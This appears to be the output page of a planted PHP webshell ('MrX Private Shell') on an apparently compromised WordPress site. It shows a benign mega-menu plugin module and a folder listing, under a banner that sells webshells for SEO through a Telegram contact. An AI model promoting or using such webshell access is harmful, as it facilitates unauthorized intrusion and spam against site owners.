__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WprAddons\Modules\MegaMenu;
use WprAddons\Base\Module_Base;
class Module extends Module_Base {
public function __construct() {
parent::__construct();
// This is here for extensibility purposes - go to town and make things happen!
}
public function get_name() {
return 'wpr-mega-menu';
}
public function get_widgets() {
return [
'WPR_Mega_Menu', // This should match the widget/element class.
];
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| walkers | Folder | 0775 |
|
|
| widgets | Folder | 0775 |
|
|
| module.php | File | 442 B | 0664 |
|